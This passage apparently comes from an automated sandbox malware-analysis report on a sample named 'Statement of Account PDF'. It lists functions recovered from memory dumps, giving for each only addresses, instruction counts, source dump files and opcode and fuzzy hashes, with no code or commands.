                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21c5fb2617899c07f3d4c0e7f09d9ea04b76b04d809437a1493f3cddb5a89b09
                                                        • Instruction ID: 20082bce5403ebacac1b3cb85c7079a851aa8a07f3c81448ca7249e49d1db4ca
                                                        • Opcode Fuzzy Hash: 21c5fb2617899c07f3d4c0e7f09d9ea04b76b04d809437a1493f3cddb5a89b09
                                                        • Instruction Fuzzy Hash: 14315D307002008FDB58DB69C884B5977B9EF85614F1580ADE546CB371DB35EE45CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEC770 Relevance: .1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cbf88d122ce068c64b390d3b543d38c7be93a26ed44cb5fa153f4e7089317438
                                                        • Instruction ID: 922d81d8c3831185ba796a5fc2a9d6f47a6f3838874785c3789b8d5e41a97850
                                                        • Opcode Fuzzy Hash: cbf88d122ce068c64b390d3b543d38c7be93a26ed44cb5fa153f4e7089317438
                                                        • Instruction Fuzzy Hash: B031AEB1E043489FDB10CFAAC844AAEFFF4EF89320F14846AD458E7251D734A945CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE4B20 Relevance: .1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1b07866e58c2666b1d3e7e777b701984f45afed0c1db7bc89c30cbc6159504a
                                                        • Instruction ID: c2037d148170b372f071bb4823708346aee714e5f6f0295caba03b8213138e3c
                                                        • Opcode Fuzzy Hash: e1b07866e58c2666b1d3e7e777b701984f45afed0c1db7bc89c30cbc6159504a
                                                        • Instruction Fuzzy Hash: 96315A34B006149FCB58DF68D884A6EB7B6FF88720F1082A9E5259B3B1CB71DD41CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEB9A0 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 96962c4279966ec690599f840ab65e2db91266dbb4479fd50cb5919334944d61
                                                        • Instruction ID: afece7f017d08f267dfbad55dd8b6253fa1980620ac78fe40e90825c2269991c
                                                        • Opcode Fuzzy Hash: 96962c4279966ec690599f840ab65e2db91266dbb4479fd50cb5919334944d61
                                                        • Instruction Fuzzy Hash: 5441BDB0D00358DFDB14CFAAC984A9EFBB1BF48714F24812AE418BB250D7706845CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEA101 Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d2d41d6d5c8b7e3b16c2cca9e638965338df68a6ac7371a50a39d81b8c6adf7f
                                                        • Instruction ID: b343955c75b3727f585ed0bd2f68745462562eb8e10e6565482fe8695d609a02
                                                        • Opcode Fuzzy Hash: d2d41d6d5c8b7e3b16c2cca9e638965338df68a6ac7371a50a39d81b8c6adf7f
                                                        • Instruction Fuzzy Hash: E8318974B006008FCB05DB38D4999AD7BF6EF8970470541AAE902CB372EB75EC06CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4970 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 33ee49fb33e64b60c6a66e02fda8704c843e6fad7c06ab809ca290c321c8f470
                                                        • Instruction ID: 3e5b85d239a2ab11881eb26e4c97fba244f72b95f84c858ecb1bb3fdfd3542b9
                                                        • Opcode Fuzzy Hash: 33ee49fb33e64b60c6a66e02fda8704c843e6fad7c06ab809ca290c321c8f470
                                                        • Instruction Fuzzy Hash: 88310471900616DBDF00DF69D8804BFBBF5EF85319B04846AEC18EB256E234D905C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074A6D14 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 03c9c600e8be6558b88230f5891796e04a88ae47f0959f1ee92c0a9972ebc41f
                                                        • Instruction ID: c93b8d058efa9a42455131be21f9fce6ccdec1ba48c492c7d4249825c7894fef
                                                        • Opcode Fuzzy Hash: 03c9c600e8be6558b88230f5891796e04a88ae47f0959f1ee92c0a9972ebc41f
                                                        • Instruction Fuzzy Hash: 4121FEB0B003599FCB05AB79AC584BF7BB6EFC4260714482AE426D7381EE348C018361
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEC7F8 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5624739d841475557c04bcd565fc70fc0cec5528fd71514cff67265abf429394
                                                        • Instruction ID: 1e5d4fadcd573eaf78460f54957e3c2ccfd090db34821f884c7630c234c8af01
                                                        • Opcode Fuzzy Hash: 5624739d841475557c04bcd565fc70fc0cec5528fd71514cff67265abf429394
                                                        • Instruction Fuzzy Hash: E1314B74E04108DFDB58DFAAD544AEEBBF6FB88300F10A06AD425A7351DB309A44CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE25D4 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64e5fc8b2c9fd25e87e6a9e94d89537c8bec7356918511b6c948245fa27f7b32
                                                        • Instruction ID: 78a6f826f5f76b814c040dd422ff392f030b751eccb759cbead9355691fba790
                                                        • Opcode Fuzzy Hash: 64e5fc8b2c9fd25e87e6a9e94d89537c8bec7356918511b6c948245fa27f7b32
                                                        • Instruction Fuzzy Hash: 70314D307406108FD7A4AB29C848B6677B5FF84324F50866DE55E8B2B1CF71F98ACB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2DA0 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f998e5fdfe5e7f285699ff656b81c1842b7324b75644f73ffcb664bff024ab9d
                                                        • Instruction ID: be3f91771c76fd7c91c0d074b7d5a62f21c3d6dc7758169377102a378ac643cc
                                                        • Opcode Fuzzy Hash: f998e5fdfe5e7f285699ff656b81c1842b7324b75644f73ffcb664bff024ab9d
                                                        • Instruction Fuzzy Hash: 7121B334B409148B9BA96A79991477E36EBAFC8652709402DD403C7398EE6CCE03D7E6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4D98 Relevance: .1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 91e489b75e7378d8d0ca8bc2ab359002c5440a3b66a8a4b3b1a128e8825cacb4
                                                        • Instruction ID: 252602a0817bf8bbccc830acffd437db0e0a3fb7f8b4d0c5f4034e211d82f5d7
                                                        • Opcode Fuzzy Hash: 91e489b75e7378d8d0ca8bc2ab359002c5440a3b66a8a4b3b1a128e8825cacb4
                                                        • Instruction Fuzzy Hash: F8213571B002458FC710DF79D4488EABBE6EFC430471588A9D10AEB361EF79EC0A8B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEBB10 Relevance: .1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 181799afc1ea392f979875b5addf4c025adaee481e236eb9e77f60970ec80b54
                                                        • Instruction ID: da518f90bcf3b879e2afb04f84155f5e43d049b71373e5c4880162341677bffb
                                                        • Opcode Fuzzy Hash: 181799afc1ea392f979875b5addf4c025adaee481e236eb9e77f60970ec80b54
                                                        • Instruction Fuzzy Hash: 9D218D71E001459FDB10EFAAD8109BFBBFAEFC4204F10806AE554E3254EB34AA058BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEC7F7 Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7d5f3117d820fded7d192f3be6eb630ccbe65014c4a2f471f3f0da11730671f0
                                                        • Instruction ID: 2f000b37ccbd8394a8d5d8e650d183c5176d3d0e75d6474ed845a70d89444875
                                                        • Opcode Fuzzy Hash: 7d5f3117d820fded7d192f3be6eb630ccbe65014c4a2f471f3f0da11730671f0
                                                        • Instruction Fuzzy Hash: 52316D74E04108DFDB54DFAAD544AEEBBF6FB88300F10A02AD425A7341DB309A40CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE0697 Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93cec6e9b8c017ae0622c013cee1aa398254a10890e335d077639609666c1538
                                                        • Instruction ID: 2c5abcf4e5a23ded40f8c865fa10ee3d288f3250c32810d0abbcfb5482b222b0
                                                        • Opcode Fuzzy Hash: 93cec6e9b8c017ae0622c013cee1aa398254a10890e335d077639609666c1538
                                                        • Instruction Fuzzy Hash: 71310232904B09DFCB01EF78C854499F771FF55310B118B9AE5996B222FB30E695CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEE817 Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7370467588b8accac70176eaec5bff84d85bd33a21b05839ae5c51133fa11813
                                                        • Instruction ID: ceb0216b476d16944b52be3ecc1828f1b50665f0afaff249aade15323bfae003
                                                        • Opcode Fuzzy Hash: 7370467588b8accac70176eaec5bff84d85bd33a21b05839ae5c51133fa11813
                                                        • Instruction Fuzzy Hash: 9A215C347002008FDB19AB3DD854A6977E6EF8571871494AEE406CB3B5DB76EC83CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4B38 Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 35ea52d80ea3a4cb3f007b564a25e40b272500ece06bf5c102a6e4c77d37c96d
                                                        • Instruction ID: e5fbfd4b0d1ea3f2e6aa7c7d957cfe0cd3c584f0c2da600ba7b7d07454ef3c00
                                                        • Opcode Fuzzy Hash: 35ea52d80ea3a4cb3f007b564a25e40b272500ece06bf5c102a6e4c77d37c96d
                                                        • Instruction Fuzzy Hash: 772178367005149BE7109F9ADC44BBFBBABEB84315B114415E901D72E5DB38EC42C3E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2A6D Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cebe9333b3d79aae693b47ecfffc082599c18489aa27f749f1950db4cf2280a5
                                                        • Instruction ID: 6e1c4e6066dce9879f5bd18a4bb0eb55b316e493ce87763322ac03aed00528ce
                                                        • Opcode Fuzzy Hash: cebe9333b3d79aae693b47ecfffc082599c18489aa27f749f1950db4cf2280a5
                                                        • Instruction Fuzzy Hash: BB314C31B002088FCBA5DFA5D544ADDB7F6EF88311F155468D802AB3A4CB35DE85CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2258 Relevance: .1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6445820c7f01067ce9ba5723881c522cd0b726be493fa588f48f54013b2141c
                                                        • Instruction ID: 772bbfc2244da4aef710aa1929c3a3a684980a1b1b21e016cc09dfe0f6282432
                                                        • Opcode Fuzzy Hash: f6445820c7f01067ce9ba5723881c522cd0b726be493fa588f48f54013b2141c
                                                        • Instruction Fuzzy Hash: FD312A302106008FC7A5DB28D848BA677F6FF85314F5585A9E09ECB361DF74AD8ACB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE5CAF Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ecbf277f9a7c53afb6c34215c8966b9af1302d4b8a3f8d8fe03af201d6742cd7
                                                        • Instruction ID: 536257cce2abcecfb78f3bc3e846c412a8c5f2b18a2f2f38f40310292663217b
                                                        • Opcode Fuzzy Hash: ecbf277f9a7c53afb6c34215c8966b9af1302d4b8a3f8d8fe03af201d6742cd7
                                                        • Instruction Fuzzy Hash: CF212B34200348CFC764DF31C89096A77F9FF82308790467DE4664B290DB36DA95DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2D90 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80415eb3660a5199e7413e20cac3836a7a66cfd68f106079f89931bc2706b45e
                                                        • Instruction ID: cef9e0fb5b8e7d03d3e69a0a5103ed6e29666b961c9bdc89c1f76fe050f0b805
                                                        • Opcode Fuzzy Hash: 80415eb3660a5199e7413e20cac3836a7a66cfd68f106079f89931bc2706b45e
                                                        • Instruction Fuzzy Hash: 8111AF35B009104B9B992A35995467E3BAAAFC9652709006ED802CB394DE6CCF02D7E6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE06A8 Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e0ba5af63e6da541a4c293581d88d401d1e56d4e0e83c28ad004bf4c3f560bc2
                                                        • Instruction ID: c1c67ebebf06a640ed8705aca9884472e1fa39e12176604b853b8ddb021a5ef2
                                                        • Opcode Fuzzy Hash: e0ba5af63e6da541a4c293581d88d401d1e56d4e0e83c28ad004bf4c3f560bc2
                                                        • Instruction Fuzzy Hash: 5131F132910B09DACB01EFB8C854899F771FF95350B118B5AE95967221FB30E6D5CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE6CC4 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64ce3ec57f5729d3934ee9ce4910edeba5da60442c2288b021728009644a022a
                                                        • Instruction ID: 5533cbcba1c7456bdc3889f609aa6df5fef29b0e0af11c71d89f9fd50ef1edc6
                                                        • Opcode Fuzzy Hash: 64ce3ec57f5729d3934ee9ce4910edeba5da60442c2288b021728009644a022a
                                                        • Instruction Fuzzy Hash: 1B214D357006149FCB24AF1AD980A7BB7A6FB84724B14942EE60687761DB71FC41CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00C5D1D4 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1696515478.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c5d000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be80cb8b231155486104bc70c9261a1b4bb131a08fa6f97296d5202375dee0b7
                                                        • Instruction ID: 6f37369cd632af81fa66c4cfb70e347d2703e23a154d79bbeb49ee12ec3d7002
                                                        • Opcode Fuzzy Hash: be80cb8b231155486104bc70c9261a1b4bb131a08fa6f97296d5202375dee0b7
                                                        • Instruction Fuzzy Hash: 42210479504300EFDB25DF14D9C0B26BBA5FB84315F20C6ADEC0A4B296C376DC8ACA65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00C5D01C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1696515478.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c5d000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 25b0d7488cd6e25d31ea518c1b5a3f26de43e609dacb837fce0380589facf572
                                                        • Instruction ID: a051aae96bde311411131f7d5ec1abe8c6dc53faa1d43ca87d8bc43a80e8e6eb
                                                        • Opcode Fuzzy Hash: 25b0d7488cd6e25d31ea518c1b5a3f26de43e609dacb837fce0380589facf572
                                                        • Instruction Fuzzy Hash: A221F279604300DFDB24DF14D9C4B26BBA5EBC4315F20C569EC0A4B296C33AD88BCA66
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE5091 Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6fa0db0be84948fb23650895360b1fc59af6c30a9376310686206419d0da8548
                                                        • Instruction ID: 8b1cc6de857b787a5c8a24d2e33de03647a41ff528786cab38011f8efa1ac7f6
                                                        • Opcode Fuzzy Hash: 6fa0db0be84948fb23650895360b1fc59af6c30a9376310686206419d0da8548
                                                        • Instruction Fuzzy Hash: AE217975A00A1A9BCF00DF9AD8804BFB7B5FF88309B049526EC08EB251E635E941C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2268 Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd573cc4d4b915814031712a7fb0b22db58bc406c5972da78565fdaa5574c100
                                                        • Instruction ID: c14e49c187c0945f0a8f70cfd2e95675bd733ab5f341c0eb3c3e6a5660ed3ca5
                                                        • Opcode Fuzzy Hash: cd573cc4d4b915814031712a7fb0b22db58bc406c5972da78565fdaa5574c100
                                                        • Instruction Fuzzy Hash: 913137302106008FC7A4DB28D848BA6B7F6FF85321F5585A9E15ECB361DF74AD8ACB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEA0D0 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 137f47d9118bd7271fb52f19fcf19aea4ea7ee5ed54acf0dff22b0ba040fed2b
                                                        • Instruction ID: 2e6b08c40d422fbc1c7d7d3e32101c8fe5fd9078bdf8b891b25b7be0a1fc7d4f
                                                        • Opcode Fuzzy Hash: 137f47d9118bd7271fb52f19fcf19aea4ea7ee5ed54acf0dff22b0ba040fed2b
                                                        • Instruction Fuzzy Hash: 9921E278B506008FCB04DF68E9998AC7BF5EF49B0531581AAE512CB372DB31EC01CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE6B98 Relevance: .1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cd62e4b32a04c83c7ad21d54c854960a97c49126a143046479e3c4102d8fab7
                                                        • Instruction ID: 8de71dd9702a9d7ded7904c0a8076bb1781c13c1bb3d3e82d228386f4d7c773b
                                                        • Opcode Fuzzy Hash: 4cd62e4b32a04c83c7ad21d54c854960a97c49126a143046479e3c4102d8fab7
                                                        • Instruction Fuzzy Hash: F71127347042004FE729DA76C891BBA73A6EFC4318F94C469E9068B285DB79E8478790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE0508 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1a214fdb61be19da9cee1f2a474aa3a190dd559240602c89089577c868810376
                                                        • Instruction ID: 30c8357bef49845ae6d8737aa2c50ff621cb6e21523429d38a154311e74f16f7
                                                        • Opcode Fuzzy Hash: 1a214fdb61be19da9cee1f2a474aa3a190dd559240602c89089577c868810376
                                                        • Instruction Fuzzy Hash: D91194383047105BE7047B69D81279F76EBEBC5B08F044029E14AEB7D6CDB9EC9157A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE0507 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d0bdd0150600343788f79f1befbafcafdc5dbd96d4d4d67cabf6564bdb7a8719
                                                        • Instruction ID: 01196e10aece9bc2ed8623834ad2cd5c628e406d86f46b158a4d39cfee5200c3
                                                        • Opcode Fuzzy Hash: d0bdd0150600343788f79f1befbafcafdc5dbd96d4d4d67cabf6564bdb7a8719
                                                        • Instruction Fuzzy Hash: E01182383046105BE7047B69D81279F76E7EBC5B08F044029E14AEB7D6CDB9AC9157A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE9780 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
